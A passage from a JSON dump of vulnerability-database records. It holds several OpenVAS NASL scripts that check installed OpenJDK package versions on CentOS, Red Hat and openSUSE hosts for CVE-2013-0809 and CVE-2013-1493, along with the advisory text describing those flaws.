script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", 
rpm:\"java-1.6.0-openjdk~1.6.0.0~1.57.1.11.9.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.57.1.11.9.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.57.1.11.9.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.57.1.11.9.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.57.1.11.9.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-22T13:09:49", "description": "Check for the Version of java", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0603 centos5 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2018-01-22T00:00:00", "id": "OPENVAS:881623", "href": "http://plugins.openvas.org/nasl.php?oid=881623", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0603 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.8. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. 
All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019268.html\");\n script_id(881623);\n script_version(\"$Revision: 8483 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 07:58:04 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:20:03 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0603\");\n script_name(\"CentOS Update for java CESA-2013:0603 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", 
rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:51:24", "description": "Check for the Version of java-1.7.0-openjdk", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "RedHat Update for java-1.7.0-openjdk RHSA-2013:0602-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:870949", "href": "http://plugins.openvas.org/nasl.php?oid=870949", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.7.0-openjdk RHSA-2013:0602-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n Note: If the web browser plug-in provided by the icedtea-web package was\n installed, the issues exposed via Java applets could have been exploited\n without user interaction if a user visited a malicious website.\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.8. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java-1.7.0-openjdk on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 
6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-March/msg00016.html\");\n script_id(870949);\n script_version(\"$Revision: 6687 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:46:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:17:57 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0602-01\");\n script_name(\"RedHat Update for java-1.7.0-openjdk RHSA-2013:0602-01\");\n\n script_summary(\"Check for the Version of java-1.7.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.8.0.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-22T13:09:57", "description": "Check for the Version of java-1.6.0-openjdk", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "RedHat Update for java-1.6.0-openjdk RHSA-2013:0604-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2018-01-22T00:00:00", "id": "OPENVAS:870950", "href": "http://plugins.openvas.org/nasl.php?oid=870950", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.6.0-openjdk RHSA-2013:0604-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n This erratum also upgrades the OpenJDK package to IcedTea6 1.11.9. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.6.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java-1.6.0-openjdk on Red Hat Enterprise Linux (v. 
5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-March/msg00018.html\");\n script_id(870950);\n script_version(\"$Revision: 8483 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 07:58:04 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:18:11 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0604-01\");\n script_name(\"RedHat Update for java-1.6.0-openjdk RHSA-2013:0604-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1.6.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:51", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "RedHat Update for java-1.7.0-openjdk RHSA-2013:0602-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870949", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870949", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.7.0-openjdk RHSA-2013:0602-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope 
that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-March/msg00016.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870949\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:17:57 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2013:0602-01\");\n script_name(\"RedHat Update for java-1.7.0-openjdk RHSA-2013:0602-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.7.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"java-1.7.0-openjdk on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 
6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n Note: If the web browser plug-in provided by the icedtea-web package was\n installed, the issues exposed via Java applets could have been exploited\n without user interaction if a user visited a malicious website.\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.8. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. 
All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.8.0.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:19", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0603 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881623", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881623", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0603 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later 
version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-March/019268.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881623\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:20:03 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0603\");\n script_name(\"CentOS Update for java CESA-2013:0603 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"java on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 
Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.8. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.8.0.el5_9\", 
rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:40:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-11-19T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for java-1_6_0-openjdk (openSUSE-SU-2013:0438-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850435", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850435", "sourceData": "# Copyright (C) 2013 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
